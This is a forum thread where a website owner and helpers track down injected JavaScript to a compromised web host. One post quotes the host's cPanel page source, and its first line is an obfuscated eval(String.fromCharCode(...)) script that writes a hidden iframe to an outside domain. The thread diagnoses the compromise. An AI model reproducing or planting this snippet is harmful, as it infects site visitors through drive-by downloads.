Sidebar Sidebar
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

Do I have a real virus? Oh geezus...

Mitthrawnuruodo said:
Let's see if we can't find the problem (if it really are local, which I strongly doubt, have you checked your ISP...?):
Do you have any "funny" plugins/addons/extentions that you use, either installed directly in your browser (like the Adblock extention in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?
Click to expand...

Adbloock is a css file...it still happens when that is turned off...I had a pdf reader plugin but the problem still happens when I take it out of the folder...

A friend who does some mac tech has told me to start looking for invisible files...and dump some user preferences...

but why on both of my computers? they run via the same hub but i rarely actually share files between the two...
 
jvaska said:
Adbloock is a css file...it still happens when that is turned off...I had a pdf reader plugin but the problem still happens when I take it out of the folder...

A friend who does some mac tech has told me to start looking for invisible files...and dump some user preferences...

but why on both of my computers? they run via the same hub but i rarely actually share files between the two...
Click to expand...
I'm not looking for your css file... I'm talking about an Extention in Firefox called Adblock, that is a jar file located in ~/Library/Application Support/Firefox/Profiles/default.xxx/extensions/{<lots of rubbish>}/chrome/

If you have installed some additions/extentions to Firefox, they are all jar files (which in this case all could be suspects), and are installed in that extentions folder. (Plug-ins go in the above mentioned folders.) If you have stuff in the extention folder that you don't know what is, delete them (which is good advice no matter what ;)).

But I think the next suspect might be your ISP, as MisterMe said they might also have some sort of ad scheme that hackers might have taken control over...
 
redeye_be said:
Just a thought, do you use a proxy server?
Click to expand...

Oh gosh, I can't remember anymore. No, I don't have one set in OSX but who knows what my router or isp have going on. Those things are mystery to me...
 
redeye_be said:
Surf to http://www.whatismyip.com/
compare the ip you get there with the external ip of your router. If they're different u are using a proxy (can this be confirmed :eek: ).
Click to expand...

Well, internally it's reported as 10.0.0.11 and externally at whatismyisp it's 83.134...etc...
 
The router has one IP that is used to identify it on the internet, in this case the 83.-address, then it gives out internal IP numbers, using DNS to all local machines connected (your local LAN), using local addresses, in this case 10.-adressed (or in other LANs 192.168.-adresses), or you can set those yourself, but if your Router is 10.0.0.1, you'll have to use a 10.-address. This has nothing to do with Proxy servers.
 
Mitthrawnuruodo said:
The router has one IP that is used to identify it on the internet, in this case the 83.-address, then it gives out internal IP numbers, using DNS to all local machines connected (your local LAN), using local addresses, in this case 10.-adressed (or in other LANs 192.168.-adresses), or you can set those yourself, but if your Router is 10.0.0.1, you'll have to use a 10.-address. This has nothing to do with Proxy servers.
Click to expand...

I understand that, but how is that going to help me try to deal with this problem? This is not looking good...
 
jvaska said:
I understand that, but how is that going to help me try to deal with this problem? This is not looking good...
Click to expand...
I was just trying to point that out, that the IP approach probably wouldn't get you anywhere...

Have you checked with your ISP? That's the best place to look, since both your machines are affected the same way... and noone else has any problems...

Also there's a couple of things that's bothering me:
jvaska said:
When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document
Click to expand...
and
jvaska said:
the problem I have is that it's interfering with my css for whatever reason
Click to expand...
If it's only when you're surfing on your own site then it has to be something on those pages... right...? And how, excactly, is it interfering with your css...?
 
proxy's are able to change the contents of a page.
if you get the same iframe on other pages as well it is deffinetly worth checking it out.

the ip you got from the whatismyip is the one you should compare with the external address of the router. the 10.... is indeed an internal one distributed via DHCP by the router. The router also has an external address (which you probably can find out by simply entering it's internal ip in a browser window). Like i said it is this address you need to compare.
 
Valid questions...

Yes, it only happens when I'm surfing my own site - or the server that my site is on. To test this out I've created simple html files without any includes or anything and it still happens. The mysterious script only appears 30% of the time...

I can tell it's there because I can see the iframe...and sometimes it will affect my css by making the text large.

I asked the host to go through things and they can't reproduce the problem. I can't find anybody who can reproduce the problem.

Actually, it could possibly be an ISP issue. We have some weird service. Periodically my site, and a few others just stop working. I can't access them...but others can. It's rather rare.

I guess I could venture that the ISP has been hacked...but in the same what that it's bizarre that my site sometimes has local outages it's equally weird that only my site gets the mysterious script.

I did try a few other proxy servers and sometimes the script still appeared.

I'm not sure what to call this...a virus...an ISP issue...whatever it is I'm not sure what to do next. I'm not sure if reinstalling the OS would work. I would call the ISP but this is Belgium...we would get nowhere with that.

Sigh...

Thanks for helping out... ;)
 
Telnet to your domain name on port 80 and then issue a GET request for your test page.

This will return the source code to you. If you see the iframe code, then your web host has a problem. If not...well....

Since you don't see it everytime, make sure to try several times.

It would definitely help us help you if you published your URL.
 
kingjr3 said:
Telnet to your domain name on port 80 and then issue a GET request for your test page.

This will return the source code to you. If you see the iframe code, then your web host has a problem. If not...well....

Since you don't see it everytime, make sure to try several times.

It would definitely help us help you if you published your URL.
Click to expand...

This is a test url page...basic html...nothing more...

http://www.vaska.com/test/

I appreciate all the help people...v
 
Well we can rule out your ISP, and if that file was "clean" when leaving your computer, it's back to your webhost...

Came up on first try, and since it's added to the top of the file I really suspect something added server side...
 

Attachments

  • Picture 1.jpg
    Picture 1.jpg
    93.3 KB · Views: 171
It came up once for me and I am 99% sure it had to do w/ me being on Windows but the second it fully loaded I needed to reboot - firefox froze up and internet went down...
 
Its your WEB HOST

I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)

Up came our friend - notice the first line in the source.

Code: 
<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script><HTML>
<HEAD>
<TITLE>cPanel</TITLE>
<link href="sys_cpanel/css/style.cssx" rel="stylesheet" type="text/css">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<style>
   body     { font-family: verdana, arial, helvetica, sans-serif; font-size: 11px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; }
   a        { color:#ffffff; text-decoration:none }
</style>
</HEAD>
<BODY leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
  <tr valign="top"> 
    <td height="75" nowrap valign="top"> 
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr> 
          <td width="10%"><a href="http://www.cpanel.net"><img src="sys_cpanel/images/index_01.gif" width="126" height="46" alt="cPanel" border=0></a></td>

          <td width="27%"><img src="sys_cpanel/images/index_02.gif" width="343" height="46"></td>
          <td width="1%" background="sys_cpanel/images/index_04.gif"><img src="sys_cpanel/images/index_04.gif" width="43" height="46"></td>
          <td width="62%" align="right" background="sys_cpanel/images/index_04.gif"><img src="sys_cpanel/images/index_03.gif" width="138" height="46"></td>
        </tr>
      </table>
    </td>
  </tr>
  <tr>
   <td valign="top">

<div style="color:ff9900; font-weight:bold; font-size:24pt; text-align:center">There is no website configured at this address.</div><br>
<br>
<div style="color:ffffff">
You are seeing this page because there is nothing configured for the site you have requested. If you think you are seeing this page in error, please contact the site administrator or datacenter responsible for this site.<br>
</div></td></tr>
<tr><td valign="bottom">
<table width=100%>
<tr><td>
<div style="color:ff9900; font-weight:bold">About cPanel:</div><br>
<div style="color:ffffff">cPanel is a leading provider of software for the webhosting industry. If you would like to learn more about cPanel please visit our website at <a class=josh href="http://www.cpanel.net/">http://www.cpanel.net/</a>. Please be advised that cPanel is not a webhosting company itself, and as such is not responsible for content found elsewhere on this site.</div>
</tr>

</table>
   </td>
  </tr>
  <tr> 
    <td height="10"> 
      <table width="100%" border="0" cellspacing="0" cellpadding="0" background="sys_cpanel/images/bbg.gif">
        <tr align="center"> 
          <td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bbg.gif" width="179" height="22"></td>
          <td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bottom_label.gif" width="382" height="22"></td>
          <td background="sys_cpanel/images/bbg.gif"><img src="sys_cpanel/images/bbg.gif" width="179" height="22"></td>
        </tr>

      </table>
    </td>
  </tr>
</table>
<!--- REVISION: 1.2 --->
</BODY>
</HTML>
 
kingjr3 said:
Its your WEB HOST

I went to http://server145.ezbudgethosting.com (machine where your site is hosted, BTW)

Up came our friend - notice the first line in the source.
Click to expand...
Nice catch... I think we have a winner...!

jvaska, if your webhost doubts it just give them a link to that... and give 'em a good yelling for letting us run through hoops all day for nothing, as they were the initial suspects... ;)
 
WOW!!! What's weird is I had others try it and it just wouldn't come up...maybe it only comes up on Mac's? But I had tried other macs...

Well, if they can't nab the virus then I'll ask to be moved to another server. But these guys have always been very professional (I've been with them for a couple years). I'm sure they will read this and get back in there and take care of things.

Relieved...thanks for all the help...v
 
irmongoose said:
I used Safari to access the page. It started to download a file called "object.cfm".

The code in the file is really long... too long to post here.
irmongoose
Click to expand...

Oh geezus...that happened to me yesterday but I couldn't figure out where it came from. I just deleted it when it appeared...

Wow...proof of concept there that hackers can at least auto download a file to your computer while using Safari.
 
jvaska said:
Oh geezus...that happened to me yesterday but I couldn't figure out where it came from. I just deleted it when it appeared...

Wow...proof of concept there that hackers can at least auto download a file to your computer while using Safari.
Click to expand...

I get the object.cfm file in Safari, too. But I don't think the auto download should be considered a new proof of concept since versiontracker among others use a similar approach when you download anything through them.
 
gekko513 said:
I get the object.cfm file in Safari, too. But I don't think the auto download should be considered a new proof of concept since versiontracker among others use a similar approach when you download anything through them.
Click to expand...

Probably. I'm in new waters here...everything I say should be taken as a newbie worrying about what's going on here. ;)
 
You must log in or register to reply here.
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.
Top Bottom
Back